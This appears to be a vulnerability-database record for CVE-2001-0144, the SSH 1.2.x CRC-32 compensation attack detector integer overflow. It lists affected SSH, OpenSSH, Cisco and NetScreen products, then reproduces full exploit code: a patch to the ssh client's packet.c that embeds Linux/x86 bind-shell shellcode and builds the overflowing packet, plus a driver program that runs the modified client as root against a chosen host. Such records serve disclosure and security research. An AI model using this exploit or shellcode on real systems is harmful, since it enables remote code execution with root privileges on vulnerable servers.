ID

VAR-E-200102-0016


CVE

cve_id:CVE-2001-0144

Trust: 1.6

sources: EXPLOIT-DB: 20617 // EDBNET: 42757

EDB ID

20617


TITLE

SSH 1.2.x - CRC-32 Compensation Attack Detector - Unix remote Exploit

Trust: 0.6

sources: EXPLOIT-DB: 20617

DESCRIPTION

SSH 1.2.x - CRC-32 Compensation Attack Detector. CVE-2001-0144CVE-795 . remote exploit for Unix platform

Trust: 0.6

sources: EXPLOIT-DB: 20617

AFFECTED PRODUCTS

vendor:sshmodel: - scope:eqversion:1.2.x

Trust: 1.0

vendor:sshmodel:communications security sshscope:eqversion:1.2.31

Trust: 0.3

vendor:sshmodel:communications security sshscope:eqversion:1.2.30

Trust: 0.3

vendor:sshmodel:communications security sshscope:eqversion:1.2.29

Trust: 0.3

vendor:sshmodel:communications security sshscope:eqversion:1.2.28

Trust: 0.3

vendor:sshmodel:communications security sshscope:eqversion:1.2.27

Trust: 0.3

vendor:sshmodel:communications security sshscope:eqversion:1.2.26

Trust: 0.3

vendor:sshmodel:communications security sshscope:eqversion:1.2.25

Trust: 0.3

vendor:sshmodel:communications security sshscope:eqversion:1.2.24

Trust: 0.3

vendor:securemodel:computing safeword agent for sshscope:eqversion:1.0

Trust: 0.3

vendor:opensshmodel:opensshscope:eqversion:2.2

Trust: 0.3

vendor:opensshmodel:opensshscope:eqversion:2.1.1

Trust: 0.3

vendor:opensshmodel:opensshscope:eqversion:2.1

Trust: 0.3

vendor:opensshmodel:opensshscope:eqversion:1.2.3

Trust: 0.3

vendor:opensshmodel:opensshscope:eqversion:1.2.2

Trust: 0.3

vendor:netscreenmodel:screenos r2scope:eqversion:3.1.1

Trust: 0.3

vendor:netscreenmodel:screenos r9scope:eqversion:3.1

Trust: 0.3

vendor:netscreenmodel:screenos r2scope:eqversion:3.1

Trust: 0.3

vendor:netscreenmodel:screenos r1scope:eqversion:3.1

Trust: 0.3

vendor:netscreenmodel:screenos r1.1scope:eqversion:3.0.3

Trust: 0.3

vendor:netscreenmodel:screenos r2scope:eqversion:3.0.1

Trust: 0.3

vendor:netscreenmodel:screenos r5scope:eqversion:2.6.1

Trust: 0.3

vendor:netscreenmodel:screenos r4scope:eqversion:2.6.1

Trust: 0.3

vendor:netscreenmodel:screenos r3scope:eqversion:2.6.1

Trust: 0.3

vendor:netscreenmodel:screenos r2scope:eqversion:2.6.1

Trust: 0.3

vendor:netscreenmodel:screenos r1scope:eqversion:2.6.1

Trust: 0.3

vendor:netscreenmodel:screenosscope:eqversion:2.6.1

Trust: 0.3

vendor:ciscomodel:pix firewallscope:eqversion:5.3(1)

Trust: 0.3

vendor:ciscomodel:pix firewallscope:eqversion:5.2(5)

Trust: 0.3

vendor:ciscomodel:ios 12.2xqscope: - version: -

Trust: 0.3

vendor:ciscomodel:ios 12.2xhscope: - version: -

Trust: 0.3

vendor:ciscomodel:ios 12.2xescope: - version: -

Trust: 0.3

vendor:ciscomodel:ios 12.2xdscope: - version: -

Trust: 0.3

vendor:ciscomodel:ios 12.2xascope: - version: -

Trust: 0.3

vendor:ciscomodel:ios 12.2tscope: - version: -

Trust: 0.3

vendor:ciscomodel:iosscope:eqversion:12.2

Trust: 0.3

vendor:ciscomodel:ios 12.1yfscope: - version: -

Trust: 0.3

vendor:ciscomodel:ios 12.1ydscope: - version: -

Trust: 0.3

vendor:ciscomodel:ios 12.1ycscope: - version: -

Trust: 0.3

vendor:ciscomodel:ios 12.1ybscope: - version: -

Trust: 0.3

vendor:ciscomodel:ios 12.1yascope: - version: -

Trust: 0.3

vendor:ciscomodel:ios 12.1xyscope: - version: -

Trust: 0.3

vendor:ciscomodel:iosscope:eqversion:12.1xv

Trust: 0.3

vendor:ciscomodel:ios 12.1xuscope: - version: -

Trust: 0.3

vendor:ciscomodel:ios 12.1xtscope: - version: -

Trust: 0.3

vendor:ciscomodel:ios 12.1xsscope: - version: -

Trust: 0.3

vendor:ciscomodel:ios 12.1xrscope: - version: -

Trust: 0.3

vendor:ciscomodel:ios 12.1xqscope: - version: -

Trust: 0.3

vendor:ciscomodel:ios 12.1xpscope: - version: -

Trust: 0.3

vendor:ciscomodel:ios 12.1xmscope: - version: -

Trust: 0.3

vendor:ciscomodel:ios 12.1xlscope: - version: -

Trust: 0.3

vendor:ciscomodel:ios 12.1xkscope: - version: -

Trust: 0.3

vendor:ciscomodel:ios 12.1xjscope: - version: -

Trust: 0.3

vendor:ciscomodel:ios 12.1xiscope: - version: -

Trust: 0.3

vendor:ciscomodel:ios 12.1xhscope: - version: -

Trust: 0.3

vendor:ciscomodel:ios 12.1xgscope: - version: -

Trust: 0.3

vendor:ciscomodel:ios 12.1xfscope: - version: -

Trust: 0.3

vendor:ciscomodel:ios 12.1xescope: - version: -

Trust: 0.3

vendor:ciscomodel:ios 12.1xdscope: - version: -

Trust: 0.3

vendor:ciscomodel:ios 12.1xcscope: - version: -

Trust: 0.3

vendor:ciscomodel:ios 12.1xbscope: - version: -

Trust: 0.3

vendor:ciscomodel:ios 12.1xascope: - version: -

Trust: 0.3

vendor:ciscomodel:ios 12.1tscope: - version: -

Trust: 0.3

vendor:ciscomodel:ios 12.1ezscope: - version: -

Trust: 0.3

vendor:ciscomodel:ios 12.1eyscope: - version: -

Trust: 0.3

vendor:ciscomodel:ios 12.1exscope: - version: -

Trust: 0.3

vendor:ciscomodel:ios 12.1ecscope: - version: -

Trust: 0.3

vendor:ciscomodel:ios 12.1escope: - version: -

Trust: 0.3

vendor:ciscomodel:ios 12.1dcscope: - version: -

Trust: 0.3

vendor:ciscomodel:ios 12.1dbscope: - version: -

Trust: 0.3

vendor:ciscomodel:ios 12.10sscope: - version: -

Trust: 0.3

vendor:ciscomodel:ios 12.0sscope: - version: -

Trust: 0.3

vendor:ciscomodel:catalystscope:eqversion:60006.2(0.110)

Trust: 0.3

vendor:sshmodel:communications security ssh2scope:neversion:2.4

Trust: 0.3

vendor:sshmodel:communications security ssh2scope:neversion:2.3

Trust: 0.3

vendor:sshmodel:communications security ssh2scope:neversion:2.2

Trust: 0.3

vendor:sshmodel:communications security ssh2scope:neversion:2.1

Trust: 0.3

vendor:sshmodel:communications security ssh2scope:neversion:2.0

Trust: 0.3

vendor:opensshmodel:opensshscope:neversion:2.3

Trust: 0.3

vendor:ciscomodel:webns b11sscope:neversion:5.0

Trust: 0.3

vendor:ciscomodel:webns 1b6sscope:neversion:5.0

Trust: 0.3

vendor:ciscomodel:webns 0b22sscope:neversion:4.1

Trust: 0.3

vendor:ciscomodel:webns 1b42sscope:neversion:4.0

Trust: 0.3

vendor:ciscomodel:pix firewallscope:neversion:6.0(1)

Trust: 0.3

vendor:ciscomodel:pix firewallscope:neversion:5.3(2)

Trust: 0.3

vendor:ciscomodel:pix firewallscope:neversion:5.2(6)

Trust: 0.3

vendor:ciscomodel:iosscope:neversion:12.2(3)

Trust: 0.3

vendor:ciscomodel:ios 12.2 tscope:neversion: -

Trust: 0.3

vendor:ciscomodel:ios 12.2 xascope:neversion: -

Trust: 0.3

vendor:ciscomodel:ios 12.2scope:neversion: -

Trust: 0.3

vendor:ciscomodel:iosscope:neversion:12.2(1.1)

Trust: 0.3

vendor:ciscomodel:ios 12.2 xqscope:neversion: -

Trust: 0.3

vendor:ciscomodel:ios 12.2 xhscope:neversion: -

Trust: 0.3

vendor:ciscomodel:ios 12.2 xd1scope:neversion: -

Trust: 0.3

vendor:ciscomodel:ios 12.1 escope:neversion: -

Trust: 0.3

vendor:ciscomodel:ios 12.1 ec3scope:neversion: -

Trust: 0.3

vendor:ciscomodel:ios 12.1 ez1scope:neversion: -

Trust: 0.3

vendor:ciscomodel:ios 12.1 eyscope:neversion: -

Trust: 0.3

vendor:ciscomodel:ios 12.1 yf2scope:neversion: -

Trust: 0.3

vendor:ciscomodel:ios 12.1 yd2scope:neversion: -

Trust: 0.3

vendor:ciscomodel:ios 12.1 yc1scope:neversion: -

Trust: 0.3

vendor:ciscomodel:ios 12.1 yb4scope:neversion: -

Trust: 0.3

vendor:ciscomodel:ios 12.1 xy6scope:neversion: -

Trust: 0.3

vendor:ciscomodel:iosscope:neversion:12.1(5)xv3

Trust: 0.3

vendor:ciscomodel:ios 12.1 xu1scope:neversion: -

Trust: 0.3

vendor:ciscomodel:ios 12.1 xr2scope:neversion: -

Trust: 0.3

vendor:ciscomodel:ios 12.1 xg5scope:neversion: -

Trust: 0.3

vendor:ciscomodel:ios 12.1 xm4scope:neversion: -

Trust: 0.3

vendor:ciscomodel:ios 12.1 xt3scope:neversion: -

Trust: 0.3

vendor:ciscomodel:ios 12.1 xp4scope:neversion: -

Trust: 0.3

vendor:ciscomodel:ios 12.0 sscope:neversion: -

Trust: 0.3

vendor:ciscomodel:catalyst panscope:neversion:60006.3

Trust: 0.3

vendor:ciscomodel:catalystscope:neversion:60006.2(0.111)

Trust: 0.3

vendor:ciscomodel:catalystscope:neversion:60006.1(2.13)

Trust: 0.3

sources: BID: 2347 // EXPLOIT-DB: 20617

EXPLOIT

// source: https://www.securityfocus.com/bid/2347/info

Secure Shell, or SSH, is an encrypted remote access protocol. SSH or code based on SSH is used by many systems all over the world and in a wide variety of commercial applications. An integer-overflow bug in the CRC32 compensation attack detection code may allow remote attackers to write values to arbitrary locations in memory.

This would occur in situations where large SSH packets are recieved by either a client or server, and a 32 bit representation of the SSH packet length is assigned to a 16 bit integer. The difference in data representation in these situations will cause the 16 bit variable to be assigned to zero (or a really low value).

As a result, future calls to malloc() as well as an index used to reference locations in memory can be corrupted by an attacker. This could occur in a manner that can be exploited to write certain numerical values to almost arbitrary locations in memory.

This can lead to an attacker executing arbitrary code with the privileges of the SSH server (usually root) or the SSH client.

**UPDATE**:

There have been reports suggesting that exploitation of this vulnerability may be widespread.

Since early september, independent, reliable sources have confirmed that this vulnerability is being exploited by attackers on the Internet. Security Focus does not currently have the exploit code being used, however this record will be updated if and when it becomes available.

NOTE: Cisco 11000 Content Service Switch family is vulnerable to this issue. All WebNS releases prior, but excluding, versions: 4.01 B42s, 4.10 22s, 5.0 B11s, 5.01 B6s, are vulnerable.

Secure Computing SafeWord Agent for SSH is reportedly prone to this issue, as it is based on a vulnerable version of SSH.

** NetScreen ScreenOS is not directly vulnerable to this issue, however the referenced exploit will cause devices using vulnerable versions of the software to stop functioning properly. This will result in a denial of service condition for NetScreen devices. This issue is in the Secure Command Shell (SCS) administrative interface, which is an implementation of SSHv1. SCS is not enabled on NetScreen devices by default.

# Exploit code in the form of ssh client patches by Hugo Dias < bsphere@clix.pt >.

- --- packet.c Sat Oct 14 06:23:12 2000
+++ packet.c Tue Feb 20 09:33:00 2001
@@ -68,6 +68,85 @@
#define DBG(x)
#endif

+
+/*
+ * Linux/x86
+ * TCP/36864 portshell (old, could be optimized further)
+ */
+
+char shellcode[] = /* anathema <anathema@hack.co.za> */
+/* main: */
+"\xeb\x72" /* jmp callz */
+/* start: */
+"\x5e" /* popl %esi */
+
+ /* socket() */
+"\x29\xc0" /* subl %eax, %eax */
+"\x89\x46\x10" /* movl %eax, 0x10(%esi) */
+"\x40" /* incl %eax */
+"\x89\xc3" /* movl %eax, %ebx */
+"\x89\x46\x0c" /* movl %eax, 0x0c(%esi) */
+"\x40" /* incl %eax */
+"\x89\x46\x08" /* movl %eax, 0x08(%esi) */
+"\x8d\x4e\x08" /* leal 0x08(%esi), %ecx */
+"\xb0\x66" /* movb $0x66, %al */
+"\xcd\x80" /* int $0x80 */
+
+ /* bind() */
+"\x43" /* incl %ebx */
+"\xc6\x46\x10\x10" /* movb $0x10, 0x10(%esi) */
+"\x66\x89\x5e\x14" /* movw %bx, 0x14(%esi) */
+"\x88\x46\x08" /* movb %al, 0x08(%esi) */
+"\x29\xc0" /* subl %eax, %eax */
+"\x89\xc2" /* movl %eax, %edx */
+"\x89\x46\x18" /* movl %eax, 0x18(%esi) */
+"\xb0\x90" /* movb $0x90, %al */
+"\x66\x89\x46\x16" /* movw %ax, 0x16(%esi) */
+"\x8d\x4e\x14" /* leal 0x14(%esi), %ecx */
+"\x89\x4e\x0c" /* movl %ecx, 0x0c(%esi) */
+"\x8d\x4e\x08" /* leal 0x08(%esi), %ecx */
+"\xb0\x66" /* movb $0x66, %al */
+"\xcd\x80" /* int $0x80 */
+
+ /* listen() */
+"\x89\x5e\x0c" /* movl %ebx, 0x0c(%esi) */
+"\x43" /* incl %ebx */
+"\x43" /* incl %ebx */
+"\xb0\x66" /* movb $0x66, %al */
+"\xcd\x80" /* int $0x80 */
+
+ /* accept() */
+"\x89\x56\x0c" /* movl %edx, 0x0c(%esi) */
+"\x89\x56\x10" /* movl %edx, 0x10(%esi) */
+"\xb0\x66" /* movb $0x66, %al */
+"\x43" /* incl %ebx */
+"\xcd\x80" /* int $0x80 */
+
+ /* dup2(s, 0); dup2(s, 1); dup2(s, 2); */
+"\x86\xc3" /* xchgb %al, %bl */
+"\xb0\x3f" /* movb $0x3f, %al */
+"\x29\xc9" /* subl %ecx, %ecx */
+"\xcd\x80" /* int $0x80 */
+"\xb0\x3f" /* movb $0x3f, %al */
+"\x41" /* incl %ecx */
+"\xcd\x80" /* int $0x80 */
+"\xb0\x3f" /* movb $0x3f, %al */
+"\x41" /* incl %ecx */
+"\xcd\x80" /* int $0x80 */
+
+ /* execve() */
+"\x88\x56\x07" /* movb %dl, 0x07(%esi) */
+"\x89\x76\x0c" /* movl %esi, 0x0c(%esi) */
+"\x87\xf3" /* xchgl %esi, %ebx */
+"\x8d\x4b\x0c" /* leal 0x0c(%ebx), %ecx */
+"\xb0\x0b" /* movb $0x0b, %al */
+"\xcd\x80" /* int $0x80 */
+
+/* callz: */
+"\xe8\x89\xff\xff\xff" /* call start */
+"/bin/sh";
+
+
/*
* This variable contains the file descriptors used for communicating with
* the other side. connection_in is used for reading; connection_out for
@@ -125,6 +204,9 @@
/* Session key information for Encryption and MAC */
Kex *kex = NULL;

+/* Packet Number */
+int count = 0;
+
void
packet_set_kex(Kex *k)
{
@@ -461,6 +543,8 @@
unsigned int checksum;
u_int32_t rand = 0;

+ count++;
+
/*
* If using packet compression, compress the payload of the outgoing
* packet.
@@ -1172,7 +1256,64 @@
void
packet_write_poll()
{
- - int len = buffer_len(&output);
+ int len;
+ char buf[50],*p,*ptr;
+ char code[270000];
+ long sz;
+ FILE *f;
+
+ if (count == 2)
+ {
+ f = fopen("/tmp/code","r");
+ fgets(buf,28,f);
+ fclose(f);
+
+ sz = GET_32BIT(&buf[24]);
+ buffer_clear(&output);
+ buffer_append(&output,code,sz);
+
+ len = buffer_len(&output);
+
+ ptr = buffer_ptr(&output);
+
+ for(p = ptr + 4 ; p < ptr + GET_32BIT(&buf[16]) ; p+=8)
+ {
+ *p=buf[0];
+ *(p+1)=buf[1];
+ *(p+2)=buf[2];
+ *(p+3)=buf[3];
+ *(p+4)=buf[4];
+ *(p+5)=buf[5];
+ *(p+6)=buf[6];
+ *(p+7)=buf[7];
+ }
+
+ sz = ((GET_32BIT(&buf[20]) + 8) & ~7);
+
+ for(p = p ; p < ptr + sz ; p+=8)
+ {
+ *p=buf[8];
+ *(p+1)=buf[9];
+ *(p+2)=buf[10];
+ *(p+3)=buf[11];
+ *(p+4)=buf[12];
+ *(p+5)=buf[13];
+ *(p+6)=buf[14];
+ *(p+7)=buf[15];
+ }
+
+ sz = len - GET_32BIT(&buf[20]);
+
+ memset(p,'\x90',sz);
+ memcpy(p+sz-strlen(shellcode)-16,&shellcode,strlen(shellcode));
+ memcpy(ptr,&buf[20],4);
+
+ count++;
+ }
+
+ len = buffer_len(&output);
+
+
if (len > 0) {
len = write(connection_out, buffer_ptr(&output), len);
if (len <= 0) {
@@ -1299,3 +1440,4 @@
max_packet_size = s;
return s;
}
+

- ------------------------------------------------------------------------------------

/*

THIS FILE IS FOR EDUCATIONAL PURPOSE ONLY.

BlackSphere - Hugo Oliveira Dias
Tue Feb 20 16:18:00 2001

Email: bsphere@clix.pt
Homepage: http://planeta.clix.pt/bsphere

Exploit code for using the modified ssh

*/
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <sys/types.h>
#include <sys/stat.h>
#include <fcntl.h>

/* Path to modified ssh */
#define PATH_SSH "./ssh"

int main(int argc,char *argv[])
{
int f;
int port;
unsigned long addr,*ptr;
char *buffer,*aux,ch,*ssh;
int i;

if (argc < 8)
{
printf("\nUsage : %s <saved eip> <count> <packet length> <username length> <host> \
<port> <h(i)>\n\n",argv[0]);

fflush(stdout);
_exit(0);
}

port=atoi(argv[6]);

buffer = (char *) malloc(29);

ptr = (unsigned long *) buffer;

*(ptr++) = 1543007393 + strtoul(argv[1],0,10);
*(ptr++) = 0;
*(ptr++) = strtoul(argv[7],0,10);
*(ptr++) = 0;
*(ptr++) = 16520 + strtoul(argv[2],0,10);
*(ptr++) = strtoul(argv[3],0,10);
*(ptr++) = strtoul(argv[4],0,10);

buffer[29]=0;

for(i = 0 ; i < 27 ; i+=4)
{
aux = buffer + i;
ch=*aux;
*aux=*(aux+3);
*(aux+3)=ch;
ch=*(aux+1);
*(aux+1)=*(aux+2);
*(aux+2)=ch;
}

printf("\nSaved Eip : &h + %u",1543007393 + strtoul(argv[1],0,10));
printf("\nReturn Address : 0x%xxxxx",(16520+strtoul(argv[2],0,10))/8);
printf("\nPacket Length : %u",(strtoul(argv[3],0,10)+8) & ~7);
printf("\nUsername Length : %u\n\n",strtoul(argv[4],0,10));
fflush(stdout);

f = open("/tmp/code",O_RDWR | O_CREAT,S_IRWXU);
write(f,buffer,28);
close(f);

ssh = (char *) malloc(strlen(PATH_SSH) + 100 + strlen(argv[5]));

strcpy(ssh,PATH_SSH);

sprintf(ssh+strlen(PATH_SSH)," -p %i -v -l root %s",port,argv[5]);

printf("%s\n",ssh);

system(ssh);

_exit(0);
}

Trust: 1.0

sources: EXPLOIT-DB: 20617

EXPLOIT LANGUAGE

c

Trust: 0.6

sources: EXPLOIT-DB: 20617

PRICE

free

Trust: 0.6

sources: EXPLOIT-DB: 20617

TYPE

CRC-32 Compensation Attack Detector

Trust: 1.0

sources: EXPLOIT-DB: 20617

CREDITS

Michal Zalewski

Trust: 0.6

sources: EXPLOIT-DB: 20617

EXTERNAL IDS

db:EXPLOIT-DBid:20617

Trust: 1.9

db:BIDid:2347

Trust: 1.9

db:NVDid:CVE-2001-0144

Trust: 1.6

db:EDBNETid:42757

Trust: 0.6

sources: BID: 2347 // EXPLOIT-DB: 20617 // EDBNET: 42757

REFERENCES

url:https://nvd.nist.gov/vuln/detail/cve-2001-0144

Trust: 1.6

url:https://www.securityfocus.com/bid/2347/info

Trust: 1.0

url:https://www.exploit-db.com/exploits/20617/

Trust: 0.6

url:http://www.netscreen.com/index.html

Trust: 0.3

url:http://www.netscreen.com/support/alerts/11_06_02.html

Trust: 0.3

url:https://www.exploit-db.com/exploits/20617

Trust: 0.3

url:http://support.coresecurity.com/impact/exploits/56f46f9564b53fc1bca5bef469b60df7.html

Trust: 0.3

url:http://www.cisco.com/warp/public/707/ssh-multiple-pub.html

Trust: 0.3

sources: BID: 2347 // EXPLOIT-DB: 20617 // EDBNET: 42757

SOURCES

db:BIDid:2347
db:EXPLOIT-DBid:20617
db:EDBNETid:42757

LAST UPDATE DATE

2022-07-27T09:34:35.002000+00:00


SOURCES UPDATE DATE

db:BIDid:2347date:2001-02-08T00:00:00

SOURCES RELEASE DATE

db:BIDid:2347date:2001-02-08T00:00:00
db:EXPLOIT-DBid:20617date:2001-02-08T00:00:00
db:EDBNETid:42757date:2001-02-08T00:00:00